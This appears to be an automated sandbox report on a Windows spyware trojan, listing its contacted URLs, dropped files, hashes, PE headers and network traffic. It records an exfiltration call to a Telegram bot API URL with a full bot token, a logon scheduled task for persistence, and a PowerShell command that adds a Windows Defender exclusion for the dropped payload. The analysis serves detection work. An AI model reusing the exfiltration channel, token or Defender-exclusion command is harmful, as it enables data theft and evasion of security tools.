                                            http://www.jiyu-kobo.co.jp/S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocumentdocument-----S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiS.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleaseS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fonts.comS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleaseS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://api.telegram.orgS.O.A18052022.exe, 00000008.00000002.506594458.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000002.506710013.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameS.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sakkal.comS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.ipify.org%S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      low
                                                      https://api.telegram.orgD8S.O.A18052022.exe, 00000008.00000002.506710013.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      api.telegram.orgUnited Kingdom
                                                      62041TELEGRAMRUfalse
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:626526
                                                      Start date and time: 14/05/202208:44:072022-05-14 08:44:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 59s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:S.O.A18052022.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:33
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@9/9@2/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 1.7% (good quality ratio 1.4%)
                                                      • Quality average: 66.4%
                                                      • Quality standard deviation: 37.3%
                                                      HCA Information:
                                                      • Successful, ratio: 94%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      08:45:14API Interceptor724x Sleep call for process: S.O.A18052022.exe modified
                                                      08:45:22API Interceptor36x Sleep call for process: powershell.exe modified
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1308
                                                      Entropy (8bit):5.345811588615766
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                      MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                      SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                      SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                      SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22276
                                                      Entropy (8bit):5.603075501556386
                                                      Encrypted:false
                                                      SSDEEP:384:HtCDLC0UTDR0rpyMSYJnAjultI+z/Y9gtSJ3xeT1MaXZlbAV7jJS5ZBDI+iOY:h04MpJAClth7tc8C+fwoVM
                                                      MD5:A5D531404CF03BC5EE715F2C078E95F1
                                                      SHA1:842DD2B635E3724937FD63E2636F5729A3B19889
                                                      SHA-256:4334A333D2621CB0237E2929AA28EA9726D6CE3559E7EE2930F31C18D6978A4F
                                                      SHA-512:B38730B64AE60A55B1C4A4A44CA80F2FC89BFEA356FF46698688985D94BD79F2AED926F17DD50D0A644AD73593040907FE02F780AB36CA4809C23E21B455C91D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:@...e...........y.......h.u...........n...H..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1
                                                      Process:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1600
                                                      Entropy (8bit):5.158850684888765
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNthxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTnv
                                                      MD5:7247CD530C4068B1CEACD3C5D29978E1
                                                      SHA1:60AAD0B574472656ED52B233C25D2394F7F9D567
                                                      SHA-256:4E727057542CBF7045DF606622036654217F1480C452B4324347BF079896FED0
                                                      SHA-512:E15C26E3A86608C7BC7F3D406861E0BB55BFF9A6AA0E69EF250D0D8F08B241B4B4125C3131AD65345D32277B907EC4F86BE1B917D0D544F25043D555D8CE9F89
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                      Process:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):677888
                                                      Entropy (8bit):7.754640154993143
                                                      Encrypted:false
                                                      SSDEEP:12288:aZ49yHsd5fwlbBRoVVgOsj70AoGKLNG+m82DQAvKQ92v6s99xdRg0FHU9PpFx:LRFA+VkBoGKZJN2EkJs9nmx
                                                      MD5:F2023F2BC7BB270D24F99C9D35D3AD18
                                                      SHA1:C5AC81E00B800D2A0A7F62C027602AC558B66A4E
                                                      SHA-256:CE8A8DCF86D3395B6B9F349E4D2677AE515F1B067FEBB8F77B070043898EBE8A
                                                      SHA-512:6FF75CAB794A4303CC47D5DD1233E302199186E10D512A12E74E83B805F664E52623703B50ED3123F86D4F20A8B8B559C2BC559959B2B0D1676D8D9A05BD8EEA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Virustotal, Detection: 50%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}b..............0..P..........^n... ........@.. ....................................@..................................n..K....................................m............................................... ............... ..H............text...dN... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B................@n......H.......D..............09...2...........................................~....(n...8.....(....8.....*..~....(n...8.......0..z....... ........8........E........;...8.....s.........8......*..9....8....8....8.....~......8.....~......... ....(....9....&8.......0.......... ........8........E............3...d...............Z...........R.......~...........8.....~.....o...... 8...~....(r...o....8-....~.....o..... @...~....(r...o....8.....~.....o...... ....~....(r...o.... ....8A....~.
                                                      Process:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                      Category:dropped
                                                      Size (bytes):20480
                                                      Entropy (8bit):0.6970840431455908
                                                      Encrypted:false
                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                      MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                      SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                      SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                      SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):5801
                                                      Entropy (8bit):5.417619713001348
                                                      Encrypted:false
                                                      SSDEEP:96:BZhhkN4qDo1ZOZ6hkN4qDo1Zky4KjZ8hkN4qDo1ZZbaa/Zc:b
                                                      MD5:D2A8641872D0F17CC535CCF430FCE76B
                                                      SHA1:039E5A0783BD779D760493006B3F0A5E4366E2E0
                                                      SHA-256:F6BED05B8EF3C392764262D68B5F53ABF6E85A600AD0BFEF44F9DFE2EBACD146
                                                      SHA-512:C25479258093A99BF23EC8D26CFF99C30AA13A8BB6E6B88ABEF84D4287F29D6288AEDE24C936FF58F79273B9F95385E473DAEDAC19EA140867E0F890CB796526
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220514084520..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe..Process ID: 3660..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220514084520..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe..**********************..Windows PowerShell transcript start..Start time: 20220514084831..Username: computer\user..RunAs User: DESKTOP-716T77
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.754640154993143
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:S.O.A18052022.exe
                                                      File size:677888
                                                      MD5:f2023f2bc7bb270d24f99c9d35d3ad18
                                                      SHA1:c5ac81e00b800d2a0a7f62c027602ac558b66a4e
                                                      SHA256:ce8a8dcf86d3395b6b9f349e4d2677ae515f1b067febb8f77b070043898ebe8a
                                                      SHA512:6ff75cab794a4303cc47d5dd1233e302199186e10d512a12e74e83b805f664e52623703b50ed3123f86d4f20a8b8b559c2bc559959b2b0d1676d8d9a05bd8eea
                                                      SSDEEP:12288:aZ49yHsd5fwlbBRoVVgOsj70AoGKLNG+m82DQAvKQ92v6s99xdRg0FHU9PpFx:LRFA+VkBoGKZJN2EkJs9nmx
                                                      TLSH:D7E4F17DF5E3DE12C3181A39C0E7590507B94356E2B7E3EB1A4641E88D037D76A8AB83
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}b..............0..P..........^n... ........@.. ....................................@................................
                                                      Icon Hash:00828e8e8686b000
                                                      Entrypoint:0x4a6e5e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x627DE21F [Fri May 13 04:44:15 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa6e100x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x3a4.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa6dc30x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xa4e640xa5000False0.872972892992data7.76312278649IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xa80000x3a40x400False0.37890625data2.93177414687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xaa0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_VERSION0xa80580x34cdata
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright 2017
                                                      Assembly Version1.0.0.0
                                                      InternalNameEnumeratorDropIndi.exe
                                                      FileVersion1.0.0.0
                                                      CompanyName
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameResetEvent
                                                      ProductVersion1.0.0.0
                                                      FileDescriptionResetEvent
                                                      OriginalFilenameEnumeratorDropIndi.exe
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 14, 2022 08:45:34.604778051 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:34.604839087 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:34.604935884 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:34.657047987 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:34.657099009 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:34.729387045 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:34.729625940 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:34.732491970 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:34.732522964 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:34.732916117 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:34.877376080 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:35.079754114 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:35.108196974 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:35.109905958 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:35.152493954 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:35.275226116 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:35.275357962 CEST44349739149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:35.275455952 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:35.276073933 CEST49739443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.520648956 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.520714045 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.521409988 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.521898985 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.521924973 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.579797029 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.582319975 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.582384109 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.633131027 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.633668900 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.633723974 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.858931065 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.859051943 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.859632015 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.859667063 CEST44349741149.154.167.220192.168.2.3
                                                      May 14, 2022 08:45:36.859683990 CEST49741443192.168.2.3149.154.167.220
                                                      May 14, 2022 08:45:36.860459089 CEST49741443192.168.2.3149.154.167.220
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 14, 2022 08:45:34.569264889 CEST5122953192.168.2.38.8.8.8
                                                      May 14, 2022 08:45:34.588376999 CEST53512298.8.8.8192.168.2.3
                                                      May 14, 2022 08:45:36.502094030 CEST4931653192.168.2.38.8.8.8
                                                      May 14, 2022 08:45:36.519171000 CEST53493168.8.8.8192.168.2.3
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
